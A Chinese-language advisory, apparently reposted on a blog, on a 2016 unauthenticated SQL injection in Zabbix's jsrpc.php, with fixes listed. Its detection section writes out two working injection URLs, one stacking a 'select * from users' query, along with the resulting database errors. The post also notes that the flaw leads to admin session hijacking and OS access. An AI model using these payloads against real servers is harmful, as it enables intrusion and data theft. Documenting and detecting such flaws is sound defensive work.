1. 程式人生 > >zabbix再現高危SQL注入漏洞,可獲作業系統許可權

zabbix再現高危SQL注入漏洞,可獲作業系統許可權

一、漏洞基本資訊

CVE編號:暫無
漏洞名稱:zabbix再現高危SQL注入漏洞
漏洞釋出日期:2016.08.17
受影響的軟體及系統:2.2.x,3.0.0-3.0.3
漏洞概述:zabbix的jsrpc的profileIdx2引數存在insert方式的SQL注入漏洞,攻擊者無需授權登陸即可登陸zabbix管理系統,也可通過script等功能輕易直接獲取zabbix伺服器的作業系統許可權。

二、漏洞原理分析

         zabbix是一個開源的企業級效能監控解決方案。近日,zabbix的jsrpc的profileIdx2引數存在insert方式的SQL注入漏洞,攻擊者無需授權登陸即可登陸zabbix管理系統,也可通過script等功能輕易直接獲取zabbix伺服器的作業系統許可權。 但是無需登入注入這裡有個前提,就是zabbix開啟了guest許可權。而在zabbix中,guest的預設密碼為空。需要有這個條件的支援才可以進行無許可權注入。
        攻擊者可以通過進一步構造語句進行錯誤型sql注射,無需獲取和破解加密的管理員密碼。 有經驗的攻擊者可以直接通過獲取admin的sessionid來根據結構演算法構造sid,替換cookie直接以管理員身份登陸。

三、漏洞檢測方法

1、手動直接檢測1:

在zabbix的地址後面加上如下url: /jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
輸出結果,出現如下圖黃色關鍵字表示漏洞存在: <div class="flickerfreescreen" data-timestamp="1471054088083" id="flickerfreescreen_1"><table class="list-table" id="t57ae81946b8cb"><thead><tr><th class="cell- width">Timestamp</th><th>Value</th></tr></thead><tbody><tr class="nothing-to-show"><td colspan="2">No data found.</td></tr></tbody></table></div><div class="msg-bad"><div class="msg-details"><ul><li>Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (39, 1, 'web.item.graph.period', '3600', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles (profileid, userid, idx, value_str, type, idx2) VALUES (40, 1, 'web.item.graph.stime', '20160813041028', 3, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]</li><li>Error in query [INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (41, 1, 'web.item.graph.isnow', '1', 2, 2'3297)] [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3297)' at line 1]</li></ul></div><span class="overlay-close-btn" onclick="javascript: $(this).closest('.msg-bad').remove();" title="Close"></span></div>

2、

手動直接檢測1

在zabbix的地址後面加上如下url:

latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385);select * from users where (1=1
如果出現下列程式碼則證明漏洞存在 SQL (0.000361):INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES(88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1) latest.php:746 →require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in/home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185

3、使用工具直接檢測3:

連結: http://pan.baidu.com/s/1dFcABxZ 密碼: 6pkf

4、線上檢測:

https://www.vulbox.com/lab

https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?service_id=1026

四、漏洞修復方案

版本升級
打補丁
關閉guest

五、漏洞修復結果驗證

1、手動直接檢測1:
2、手動直接檢測1:
3、使用工具直接檢測3

歡迎大家分享更好的思路,熱切期待^^_^^ !

相關推薦

zabbix再現高危SQL注入漏洞作業系統許可權

一、漏洞基本資訊 CVE編號:暫無漏洞名稱:zabbix再現高危SQL注入漏洞漏洞釋出日期:2016.08.17受影響的軟體及系統:2.2.x,3.0.0-3.0.3漏洞概述:zabbix的jsrp

SQL注入漏洞攻防必殺技!

SQL注入是常見的利用程式漏洞進行攻擊的方法,是很多入門級“黑客”喜歡採用的攻擊方式,近來網上對它的討論很熱烈,所以我在本期專題中為讀者揭示SQL攻擊的主要原理以及如何防範這種攻擊。攻擊源於程式漏洞 SQL注入原理導致SQL注入攻擊的漏洞並非系統造成的,主要是程

sql注入漏洞應遮蔽SQL注入攻擊

注:SQL注入好比是前端URL傳引數請求時引數以SQL 做為引數傳入,如 select 1  from dual wh

Vtiger CRM 幾處SQL注入漏洞分析測試工程師借鑑

本文由雲+社群發表 0x00 前言 乾白盒審計有小半年了,大部分是業務上的程式碼,邏輯的複雜度和功能模組結構都比較簡單,幹久了收獲也就一般,有機會接觸一個成熟的產品(vtiger CRM)進行白盒審計,從審計的技術難度上來說,都比公司內的那些業務複雜得多,而真正要提高自己技術水平,更應該看的也是

2018-10 第一次DVWA靶機爆破SQL注入漏洞記錄(GET方法使用SQLMAP、任意抓包工具)

首先進入DVWA,調整安全級別為low。 開啟SQL Injection頁面,ID欄輸入1 因為DVWA需要登入,所以使用Burp Suite抓包,包裡包含了cookie。 將抓包內容儲存至本地(/root/test) 開啟終端,輸入: sqlmap

【重溫基礎的SQL注入】圖文詳細解說java後臺用mybatis框架的SQL注入漏洞和效果展示以及預防

1.   SQL注入1.1原因描述:使用者名稱和密碼的引數是直接引用,可用拼接的方式。1.2        拼接方式' or '1'='1  (這個可以作為參考原型,變種很多,百度都有)主要是拼接成這樣的SQL:效果如此:即使沒有拼接查詢張三,依然能查到資料庫的張三,因為 '

10年前我就用 SQL注入漏洞黑了學校網站

> 我是風箏,公眾號「古時的風箏」,一個兼具深度與廣度的程式設計師鼓勵師,一個本打算寫詩卻寫起了程式碼的田園碼農! 文章會收錄在 [JavaNewBee](https://github.com/huzhicheng/JavaNewBee) 中,更有 Java 後端知識圖譜,從小白到大牛要走的路都在裡面。 標

MySQL— pymysql模組(防止sql注入視覺化軟體Navicat

一.Pymysql import pymysql #python2.X 中是 mysqldb 和 pythonmysql 用法是一模一樣的 #pymysql可以偽裝成上面這兩個模組 user = input('username: ') pwd = input('passwo

ThinkPHP 5.1.x SQL注入漏洞分析

一、背景引見 ThinkPHP 是一個疾速、複雜的基於 MVC 和麵向物件的輕量級 PHP 開發框架,遵照 Apache2 開源協議釋出。ThinkPHP從降生以來不斷秉承簡潔適用的設計準繩,在堅持出色的功能和至簡的程式碼的同時,也注重開發體驗和易用性,為 WEB 使用和 API 開發提供了強無

JDBC預處理物件PreprareStatement預防SQL注入問題提高安全性

PreparedStatement介面是Statement的子介面,它直接繼承並重載了Statement的方法。 PreprareStatement預處理物件為什麼能預防SQL注入提高安全性呢? 因為SQL語句在程式執行前已經進行了預編譯,在程式執行時第一次操作資料庫之前,SQL語

SQL注入漏洞筆記

一:注入原理 SQL注入是一種常見的Web安全漏洞,攻擊者利用這個問題,可以訪問或修改資料,或者利用潛在的資料庫漏洞進行攻擊 SQL注入是一種將SQL語句插入或天機到應用(使用者)的輸入引數中的攻擊,之後再將這些引數傳遞給後臺的SQL伺服器加以解析並執行 常見的web架構 表示層 :訪問網址

PHP程式碼審計-SQL注入漏洞挖掘

SQL注入經常出現在登入頁面,HTTP頭(user-agent/client-ip/cookies等),訂單處理等地方,在發生多個互動的地方經常會發生二次注入。 普通注入 $uid = $_GET[‘id’]; $sql = “select * from user where id=$

PHP SQL注入漏洞防範

在PHP中採用魔術引號進行過濾,但是PHP5.4之後被取消了,同時在遇到int型注入也不會那麼有效,所以用的最多的還是過濾函式和類(例如discuz,dedecms,phpcms),如果單純的過濾函式寫的不嚴謹,就會出現繞過的情況,最好的解決方法還是預編譯的方式。 GPC/runtime魔術

怎麼修復網站漏洞之metinfo遠端SQL注入漏洞修補

2018年11月23日SINE網站安全檢測平臺,檢測到MetInfo最新版本爆出高危漏洞,危害性較大,影響目前MetInfo 5.3版本到最新的 MetInfo 6.1.3版本,該網站漏洞產生的主要原因是MetInfo的上傳程式碼裡的引數值沒有進行安全過濾,導致上傳路徑這裡進行偽造路徑,並可以插入惡意的程式碼

CNVD-2018-20024——MetInfo 6.1.2 SQL注入漏洞

0x00漏洞簡介 metinfo是一個cms 6.1.2版本中存在一個sql盲注漏洞 0x01漏洞細節與漏洞利用 在\app\system\message\web\message.class.php的add函式。 get_one這裡有個columnid 這個地方是傳入int型別

思科修復Prime License Manager中的關鍵SQL注入漏洞

思科剛剛修補了一個關鍵的SQL注入漏洞,該漏洞存在於Cisco Prime License Manager(PLM)的Web框架程式碼中,旨在幫助管理員在企業範圍內管理使用者許可。 在成功利用CVE-2018-15441安全問題之後,潛在的遠端攻擊者可以在脆弱的機器上執行任意SQL查詢。 根據思科在Cis

【程式碼審計】五指CMS_v4.1.0 copyfrom.php 頁面存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

【程式碼審計】五指CMS_v4.1.0 後臺存在SQL注入漏洞分析

  0x00 環境準備 五指CMS官網:https://www.wuzhicms.com/ 網站原始碼版本:五指CMS v4.1.0 UTF-8 開源版 程式原始碼下載:https://www.wuzhicms.com/download/ 測試網站首頁:   0x01 程式碼

【程式碼審計】大米CMS_V5.5.3 SQL注入漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

【程式碼審計】XIAOCMS_後臺database.php頁面存在SQL注入漏洞

  0x00 環境準備 XIAOCMS官網: http://www.xiaocms.com/ 網站原始碼版本:XiaoCms (釋出時間:2014-12-29) 程式原始碼下載:http://www.xiaocms.com/download/XiaoCms_20141229.zip 測試網